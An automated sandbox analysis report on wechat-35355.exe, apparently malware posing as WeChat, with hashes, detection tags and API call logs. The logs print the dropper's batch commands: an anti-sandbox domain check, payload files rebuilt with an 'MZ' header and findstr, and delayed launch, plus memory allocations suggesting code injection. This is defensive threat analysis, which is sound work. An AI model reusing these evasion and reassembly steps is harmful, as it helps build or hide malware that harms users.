Summary | ZeroBOX

wechat-35355.exe

Gen1 NPKI Generic Malware UPX Malicious Library Malicious Packer Antivirus HTTP ScreenShot Create Service KeyLogger Internet API DGA Hijack Network Http API FTP Socket Escalate privileges DNS Code injection PWS Sniff Audio
Category: FILE
Machine: s1_win7_x6402
Started: Aug. 10, 2021, 9:29 a.m.
Completed: Aug. 10, 2021, 9:31 a.m.
Size 33.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e988d1994581870c6aac979f87ab2a5c
SHA256 794833762b3a94a9b1e88ffb915352823b7192255aa7ac86bbe9f93a64395854
CRC32 6EA537D7
ssdeep 786432:C6scxHyYirF8OUBLTEjuFrzRtIRIHc8F/ZY2axBrJ6Sy6xlvbS/d:C/cFor2NauFrzRmS88Y2KVgSXxQV
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: if %userdomain%==DESKTOP-QO5QU33 exit 1
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: <nul set /p = "MZ" > Pensai.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst >> Pensai.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: copy Portartela.vst T
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start Pensai.exe.com T
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: <nul set /p = "MZ" > Vacillavo.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst >> Vacillavo.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: copy Dimmi.vst K
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start Vacillavo.exe.com K
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: <nul set /p = "MZ" > Naso.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst >> Naso.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: copy Ove.vst B
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start Naso.exe.com B
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ping 127.0.0.1 -n 30
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c5f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003c5fc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ed4a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ed1e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ec8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ecfa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00348600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
packer Armadillo v1.71
resource name AVATAR
resource name IGNORE_LIST
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7566b727
registers.esp: 37940680
registers.edi: 4345012
registers.eax: 37940680
registers.ebp: 37940760
registers.edx: 50
registers.ebx: 37941044
registers.esi: 2147746133
registers.ecx: 4118472
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76fbc048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76f88926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76f8d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76fbc44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76f8d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76f8d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76f8d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76f8991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76f88d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72c66f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72c66e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72c627a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72c62652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72c6253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72c62411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72c625ab
wmic+0x39c80 @ 0xce9c80
wmic+0x3b06a @ 0xceb06a
wmic+0x3b1f8 @ 0xceb1f8
wmic+0x36fcd @ 0xce6fcd
wmic+0x3d6e9 @ 0xced6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7566b727
registers.esp: 1239936
registers.edi: 1989278224
registers.eax: 1239936
registers.ebp: 1240016
registers.edx: 1
registers.ebx: 4088180
registers.esi: 2147746133
registers.ecx: 2401417897
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2420
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1088
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe3000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x036e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2948
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1424
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01070000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00860000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72512000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ebb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ed1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71ed2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00862000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00895000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0089b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00897000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0087c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70e2a000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00886000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00887000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e0af000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0086a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dfb1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0087a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74351000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74331000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76b61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x77ab1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
